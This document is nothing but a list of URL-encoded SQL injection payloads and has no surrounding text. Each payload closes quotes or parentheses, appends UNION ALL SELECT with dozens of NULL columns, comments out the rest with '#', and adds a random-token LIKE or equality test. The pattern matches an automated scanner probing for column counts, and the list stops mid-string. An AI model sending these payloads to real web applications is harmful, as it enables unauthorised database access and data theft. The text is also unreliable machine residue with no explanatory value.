1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27KuzE%27%20LIKE%20%27KuzE 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27CwWF%27%20LIKE%20%27CwWF 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27kFlJ%27%20LIKE%20%27kFlJ 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27Yhqd%27%20LIKE%20%27Yhqd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27gZjt%27%20LIKE%20%27gZjt 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27dvAn%27%20LIKE%20%27dvAn 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27kKWs%27%20LIKE%20%27kKWs 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27RtTd%27%20LIKE%20%27RtTd 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27NOLO%27%20LIKE%20%27NOLO 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27GaJP%27%20LIKE%20%27GaJP 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27gcev%27%20LIKE%20%27gcev 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27rPXC%27%20LIKE%20%27rPXC 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27BaLz%27%20LIKE%20%27BaLz 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27itHX%27%20LIKE%20%27itHX 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Ynam%27%20LIKE%20%27Ynam 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27NriT%27%20LIKE%20%27NriT 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27vilw%27%20LIKE%20%27vilw 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27PFqc%27%20LIKE%20%27PFqc 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27eEZB%27%20LIKE%20%27eEZB 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27nnBu%27%20LIKE%20%27nnBu 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27sILT%27%20LIKE%20%27sILT 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Gmko%27%20LIKE%20%27Gmko 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27jUTY%27%20LIKE%20%27jUTY 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22RtnE%22%3D%22RtnE 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22GlJr%22%3D%22GlJr 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22MaWZ%22%3D%22MaWZ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22eaIr%22%3D%22eaIr 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22HgcH%22%3D%22HgcH 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22xzbj%22%3D%22xzbj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22eRuw%22%3D%22eRuw 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22kozc%22%3D%22kozc 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22tpou%22%3D%22tpou 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22qvqO%22%3D%22qvqO 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22hzZK%22%3D%22hzZK 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22xxhX%22%3D%22xxhX 